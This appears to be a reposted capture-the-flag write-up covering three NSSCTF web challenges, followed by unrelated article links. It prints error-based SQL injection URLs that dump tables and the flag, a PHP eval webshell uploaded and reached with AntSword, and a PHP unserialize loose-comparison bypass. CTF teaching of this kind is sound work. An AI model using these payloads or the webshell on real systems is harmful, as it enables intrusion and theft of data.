NSSCTF-Web题目5

NSSCTF-Web题目5

news2024/10/2 11:09:46

目录

[SWPUCTF 2021 新生赛]error

1、题目

2、知识点

3、思路

[LitCTF 2023]作业管理系统

1、题目

2、知识点

3、思路

[HUBUCTF 2022 新生赛]checkin

1、题目

2、知识点

3、思路

[SWPUCTF 2021 新生赛]error

1、题目

2、知识点

数据库注入、报错注入

3、思路

首先，输入一个1

输入1'

数据库语句报错，且报错信息有回显出来，加入注释符

正常回显，说明当前的闭合方式正确，为单引号的闭合，使用报错函数extractvalue

http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,database())) --+

得到数据库名为：test_db

http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='test_db'))) --+

得到两个表：test_tb,users

http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='test_db' and table_name='test_tb'))) --+

test_tb表的两个字段为：id,flag

http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='test_db' and table_name='users'))) --+

users表的三个字段：id,username,password

http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(flag) from test_db.test_tb))) --+

得到flag的前半段，这里以为另外一半藏到别的地方，其实是没完全显示出来，使用函数substring

substring()

http://node4.anna.nssctf.cn:28465/index.php?id=1' and extractvalue(1,concat(0x7e,(select substring(group_concat(flag),32,30) from test_db.test_tb))) --+

合并起来的flag：NSSCTF{eed0ee27-1b46-4520-a7b5-71dd9183d446}

[LitCTF 2023]作业管理系统

1、题目

2、知识点

文件上传，蚁剑连接

3、思路

右键，查看源码，发现登录名和密码

登录上去

这里有很多功能，我们可以上传一句话木马文件 flag.php

<?php
@eval($_POST['cmd']); #一句话木马
?>

这里我们可以知道上传到根目录下

上传成功后使用蚁剑连接

连接成功后在根目录找到flag文件

打开flag文件，得到flag

得到flag：

NSSCTF{d0dc1586-48ed-4661-8b97-02fd17bf0cd4}

[HUBUCTF 2022 新生赛]checkin

1、题目

2、知识点

PHP反序列化，数组

3、思路

题目给了我们一段代码

$data_unserialize['username']==$username&&$data_unserialize['password']==$password

审计代码，意思是username和password的值反序列后的值要相同，这里使用了弱类型比较（==）

代码中给了两个值，先进行序列化后上传看看，使用在线网站

PHP 在线工具 | 菜鸟工具 (jyshare.com)

<?php
$info = array(
'username'=>"this_is_secret",
'password'=>"this_is_not_known_to_you"
);
echo serialize($info);

http://node5.anna.nssctf.cn:25489/?info=a:2:{s:8:"username";s:14:"this_is_secret";s:8:"password";s:24:"this_is_not_known_to_you";}

flag没有出来，因为username和password的值更改了，我们不知道具体的值是什么

这里我们就要考虑怎么使两个值相同

弱比较中，true和非空、非零字符串弱比较（==）都是为true，所以我们使两个字段的值都为true

<?php
$info = array(
'username'=>true,
'password'=>true
);
echo serialize($info);

将得到的值传给info

得到flag:NSSCTF{5713f43e-708e-458e-a6fc-fd82c254f8d3}

这篇文章就先写到这里啦，哪里不懂的或者哪里不足的欢迎批评指正

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1793957.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

UE4 使用样条线做鱼儿封闭路径动画

UE4 使用样条线做鱼儿封闭路径动画

描述：鱼儿的游动动画的特点 1.通常是始终保持Y (Pitch)轴角度不变 2.调头的时候改变的是Z轴角度效果：调头的时候比较自然蓝图： 为了让鱼儿有恒定的游动速度，增加以下蓝图节点，游动速度为50 最后，让鱼…

阅读更多...

763. 划分字母区间（中等）

763. 划分字母区间（中等）

763. 划分字母区间 1. 题目描述2.详细题解3.代码实现3.1 Python3.2 Java 1. 题目描述题目中转：763. 划分字母区间 2.详细题解划分字母片段，要求每个字母仅能出现在一个片段中，划分的片段数要最多。如果没有限制要最多的情况&#xff0c…

阅读更多...

树-层序遍历序列构造二叉树

树-层序遍历序列构造二叉树

一、问题描述二、实现思路问题给出了层序遍历序列，我们使用队列来实现二叉树的构造过程： 这里注意：在写代码时，比较字符串数组内元素str和某个字符串是否相等时用str.equals("#")的操作，如果用会引发比较…

阅读更多...

派派派森03

派派派森03

1.JSON数据 Python数据和Json数据的相互转化 # 导入json模块 import json#准备符合json格式要求的python数据 data [{"name": "老王", "age": 16}, {"name": "张三", "age": 20}]# 通过json.dump(data)方法把pyt…

阅读更多...

ES6-03-模版字符串、对象的简化写法

ES6-03-模版字符串、对象的简化写法

一、模版字符串 1-1、声明反引号。 1-2、特性 1、字符串内容可以直接换行得用号连接 2、变量拼接现在： 二、对象的简化写法 ES6允许在大括号里面，直接写入变量和函数，作为对象的属性和方法。 let name milk;let chage function(){con…

阅读更多...

文心一言 VS 讯飞星火 VS chatgpt （275）-- 算法导论20.3 2题

文心一言 VS 讯飞星火 VS chatgpt （275）-- 算法导论20.3 2题

二、修改 vEB 树以支持带有卫星数据的关键字。如果要写代码，请用go语言。文心一言： vEB 树（van Emde Boas 树）是一种用于处理稀疏位集合的高效数据结构，它允许在常数时间内执行查找、插入、删除和前驱/后继操作。然…

阅读更多...

SCT53600TVB具有反向电流保护的理想二极管控制器

SCT53600TVB具有反向电流保护的理想二极管控制器

4.7V至65V工作范围 – 65V反向额定电压用于外部N沟道MOSFET的电荷泵 20mV正向压降调节 12V栅极驱动电压带启用输入驱动高侧外部N沟道MOSFET 1μA关断电流（EN低） 60μA工作静态电流（EN高） 2.3-A峰值…

阅读更多...

zabbix“专家坐诊”第241期问答

zabbix“专家坐诊”第241期问答

问题一 Q：华为交换机的100GE 1/0/1口的光模块收光值监测不到，有没有人碰到过这个问题呢？其他的端口都能监测到收光值，但是100GE 1/0/1口监测不到收光值。底层能查到，zabbix 6.0监控不到，以下是端口的报错信…

阅读更多...

EasyRecovery2024永久免费crack激活码注册码

EasyRecovery2024永久免费crack激活码注册码

在数字化时代，数据已经成为我们生活和工作中不可或缺的一部分。无论是个人用户还是企业用户，都面临着数据丢失的风险。一旦数据丢失，可能会给我们的工作带来极大的不便，甚至可能对企业造成重大损失。因此，数据安全和恢…

阅读更多...

Unity VR 零基础开发之 Pico4 MR

Unity VR 零基础开发之 Pico4 MR

一、新建Unity2021.3.37 3D工程二、切换到Android安卓平台 1、点击Unity编辑器左上角的Flie后，选择Build Setting选项。 2、弹出弹窗后，点击Android选项，然后再点击Switch Platform按钮切换成安卓平台。 3、切换完成后Android选项后面会显示…

阅读更多...

php7.3安装phalcon扩展

php7.3安装phalcon扩展

php7安装3.4版本的phalcon扩展适用于Centos6.x和Centos7.x系统，php使用7.1版本，wlnmp一键包已支持该扩展 phalcon扩展包地址：https://github.com/phalcon/cphalcon （git clone 有可能连接不上） 1、安装所需依赖&a…

阅读更多...

Hadoop3：MapReduce源码解读之Map阶段的TextInputFormat切片机制（3）

Hadoop3：MapReduce源码解读之Map阶段的TextInputFormat切片机制（3）

Job那块的断点代码截图省略，直接进入切片逻辑参考：Hadoop3：MapReduce源码解读之Map阶段的Job任务提交流程（1） 5、TextInputFormat源码解析类的继承关系它的内容比较少重写了两个父类的方法这里关心一下泛型参数…

阅读更多...

MySQL Shell 使用指南

MySQL Shell 使用指南

前言： MySQL Shell 是官方提供的 MySQL 周边适配组件，是新一代的高级客户端，在 MySQL 8.0 及其以后的版本得以慢慢推广应用。之前笔者因为 MySQL 8.0 用得比较少，一直没有详细使用过这个工具，近期在捣鼓 MySQL 8.0&am…

阅读更多...

Android Compose 十：常用组件列表监听

Android Compose 十：常用组件列表监听

1 去掉超出滑动区域时的拖拽的阴影即 overScrollMode 代码如下 CompositionLocalProvider(LocalOverscrollConfiguration provides null) {LazyColumn() {items(list, key {list.indexOf(it)}){Row(Modifier.animateItemPlacement(tween(durationMillis 250))) {Text(text…

阅读更多...

WPF真入门教程32--WPF数字大屏项目实干

WPF真入门教程32--WPF数字大屏项目实干

1、项目背景 WPF (Windows Presentation Foundation) 是微软的一个框架，用于构建桌面客户端应用程序，它支持富互联网应用程序（RIA）的开发。在数字大屏应用中，WPF可以用来构建复杂的用户界面，展示庞大的数据…

阅读更多...

《猎杀：对决》是适合什么样的人玩 Mac电脑怎么玩《猎杀：对决》

《猎杀：对决》是适合什么样的人玩 Mac电脑怎么玩《猎杀：对决》

《猎杀：对决》是一款集合了生存、竞技和恐怖元素的多人在线游戏，自推出以来受到了广大玩家的热爱。本文将详细探讨《猎杀：对决》适合什么样的人玩以及Mac电脑怎么玩《猎杀：对决》。本文将一一解析，帮助你了解这款游戏是…

阅读更多...

稍微学学react

稍微学学react

文章开始前，先划划水~ 今日份开心： 今天看之前发布的按钮npm包下载量有162次，早知道好好做了今日份不开心： 爬岗位看到一个整体都挺满意的岗位，公司位置和发展大方向都好喜欢！！！…

阅读更多...

本地Nginx的安装到使用

本地Nginx的安装到使用

借鉴文章 https://blog.csdn.net/weixin_44005802/article/details/135488448 1.官网下载链接：链接: https://nginx.org/en/download.html 2.将下载的zip包解压后，打开D:…\nginx-1.20.2\conf\nginx.conf，修改server为实际配置。 worker_pr…

阅读更多...

Vue 封装elementUI的el-popover

Vue 封装elementUI的el-popover

1.封装公共组件 <template><div class"confirm-popover disInlineBlock ml10"><el-popover placement"bottom" v-model"visible" :trigger"triggerType"><div class"confirm-popover-popover"><…

阅读更多...

分表策略，你真的分对了？

分表策略，你真的分对了？

垂直分表方案表的记录并不多，但是字段却很长，表占用空间很大，检索表的时候需要执行大量的IO，严重降低了性能。这时需要把大的字段拆分到另一个表，并且该表与原表是一对一的关系。为什么垂直拆分之后查询性能就变快…

阅读更多...

推荐文章

最新文章